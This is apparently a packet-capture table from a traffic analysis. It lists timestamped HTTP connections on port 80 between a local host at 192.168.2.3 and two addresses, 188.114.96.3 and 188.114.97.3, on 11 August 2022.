Aug 11, 2022 06:42:17.772280931 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.517294884 CEST	49747	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.534280062 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:18.534388065 CEST	49747	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.537200928 CEST	49747	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.554110050 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:18.554195881 CEST	49747	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.571082115 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:18.641688108 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:18.641735077 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:18.641812086 CEST	49747	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:18.658911943 CEST	80	49747	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.570935011 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.588134050 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.590482950 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.613256931 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.630363941 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.630528927 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.647604942 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.732111931 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.732347012 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.732391119 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:19.732456923 CEST	49748	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:19.749492884 CEST	80	49748	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:20.722404003 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.739322901 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:20.739495993 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.745320082 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.762134075 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:20.762243032 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.779179096 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:20.839010000 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:20.839044094 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:20.839148998 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.839890003 CEST	49749	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:20.856784105 CEST	80	49749	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:21.812501907 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.829464912 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:21.829591990 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.832277060 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.849179983 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:21.849293947 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.866066933 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:21.929147005 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:21.929270983 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.930432081 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:21.930520058 CEST	49750	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:21.946242094 CEST	80	49750	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:22.942922115 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:22.959748030 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:22.961738110 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:22.964431047 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:22.981486082 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:22.982178926 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:22.999497890 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:23.073542118 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:23.073584080 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:23.073744059 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:23.073791027 CEST	49751	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:23.090759039 CEST	80	49751	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:24.020174980 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.037133932 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:24.037308931 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.044622898 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.061687946 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:24.061861992 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.078896999 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:24.175990105 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:24.176037073 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:24.176181078 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.180687904 CEST	49752	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:24.197565079 CEST	80	49752	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:25.187084913 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.203994989 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:25.204076052 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.207102060 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.223891973 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:25.223962069 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.240777969 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:25.319336891 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:25.319418907 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:25.319447041 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.319473982 CEST	49753	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:25.336364031 CEST	80	49753	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.287018061 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.304059029 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.304929972 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.308314085 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.325150013 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.325208902 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.342170000 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.415497065 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.415548086 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:26.415707111 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.415816069 CEST	49754	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:26.432638884 CEST	80	49754	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:27.368329048 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.385637999 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:27.385802984 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.395951986 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.413130999 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:27.413217068 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.430319071 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:27.495721102 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:27.495778084 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:27.495922089 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.495971918 CEST	49755	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:27.513151884 CEST	80	49755	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.417392969 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.434387922 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.434564114 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.447484016 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.464387894 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.464462996 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.481306076 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.548753977 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.548799038 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:28.548935890 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.552529097 CEST	49756	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:28.569401979 CEST	80	49756	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:29.588490009 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.605339050 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:29.605452061 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.610435963 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.627255917 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:29.627373934 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.644181967 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:29.709315062 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:29.709371090 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:29.709475040 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.709501028 CEST	49757	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:29.726356030 CEST	80	49757	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.636073112 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.652921915 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.653377056 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.656105042 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.672878981 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.672983885 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.689851046 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.750089884 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.750333071 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:30.750473976 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.750526905 CEST	49758	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:30.767277002 CEST	80	49758	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.662673950 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.679579973 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.679691076 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.695873976 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.719538927 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.719686031 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.736479998 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.798857927 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.798902988 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:31.799010992 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.799355030 CEST	49759	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:31.816118002 CEST	80	49759	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:32.884382963 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:32.901541948 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:32.901670933 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:32.923604012 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:32.941028118 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:32.941155910 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:32.958271027 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:33.030349016 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:33.030396938 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:33.030462980 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:33.030495882 CEST	49760	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:33.047614098 CEST	80	49760	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:33.959796906 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:33.976710081 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:33.979643106 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:34.002289057 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:34.019325018 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:34.019488096 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:34.036395073 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:34.089981079 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:34.090102911 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:34.090325117 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:34.090471029 CEST	49761	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:34.106941938 CEST	80	49761	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:35.910921097 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:35.928006887 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:35.928137064 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:35.961536884 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:35.978678942 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:35.978749990 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:35.995698929 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:36.063500881 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:36.063543081 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:36.063702106 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:36.068044901 CEST	49762	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:36.085135937 CEST	80	49762	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.305047989 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.322096109 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.322242975 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.324990988 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.341823101 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.341988087 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.358833075 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.416142941 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.416187048 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:39.416273117 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.416321039 CEST	49763	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:39.433171988 CEST	80	49763	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:41.168018103 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.184937954 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:41.185110092 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.209816933 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.226772070 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:41.226878881 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.243835926 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:41.306250095 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:41.306293011 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:41.306368113 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.306406021 CEST	49764	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:41.323308945 CEST	80	49764	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:42.751256943 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.768125057 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:42.768299103 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.773950100 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.790827036 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:42.792331934 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.809173107 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:42.869123936 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:42.869276047 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:42.869368076 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.869415998 CEST	49766	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:42.886429071 CEST	80	49766	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.079581976 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.096406937 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.096509933 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.099149942 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.115915060 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.116035938 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.132843971 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.189769983 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.189821959 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:44.189883947 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.189915895 CEST	49774	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:44.206715107 CEST	80	49774	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:45.257196903 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.274211884 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:45.274322033 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.276947975 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.293843031 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:45.294847012 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.311892033 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:45.373523951 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:45.373560905 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:45.373722076 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.374530077 CEST	49777	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:45.391436100 CEST	80	49777	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:46.923748970 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:46.940895081 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:46.941090107 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:46.945645094 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:46.962704897 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:46.962881088 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:46.979835033 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:47.043102980 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:47.043138027 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:47.043222904 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:47.043953896 CEST	49778	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:47.060772896 CEST	80	49778	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.119430065 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.136759043 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.136955976 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.154690027 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.171808004 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.172816992 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.189809084 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.279305935 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.279371977 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:49.279472113 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.279522896 CEST	49780	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:49.296511889 CEST	80	49780	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.537385941 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.554279089 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.554387093 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.570997000 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.587933064 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.588017941 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.604933977 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.665591955 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.665627003 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:50.665725946 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.668934107 CEST	49782	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:50.685993910 CEST	80	49782	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:51.854746103 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:51.871905088 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:51.872061014 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:51.879415035 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:51.896822929 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:51.896985054 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:51.914129972 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:51.983930111 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:51.984774113 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:52.002202988 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:52.209759951 CEST	80	49785	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:52.211519003 CEST	49785	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.177912951 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.194900036 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:53.195066929 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.219319105 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.236185074 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:53.236259937 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.253082037 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:53.353355885 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:53.353394032 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:53.353482962 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.353513002 CEST	49786	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:53.370316982 CEST	80	49786	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:54.292475939 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:54.309432030 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.310303926 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:54.331478119 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:54.348395109 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.348571062 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:54.365434885 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.430865049 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.431103945 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:54.448460102 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.654195070 CEST	80	49788	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:54.654386997 CEST	49788	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:55.392188072 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.409404039 CEST	80	49789	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:55.410268068 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.412962914 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.430023909 CEST	80	49789	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:55.430126905 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.447530985 CEST	80	49789	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:55.514800072 CEST	80	49789	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:55.514834881 CEST	80	49789	188.114.97.3	192.168.2.3
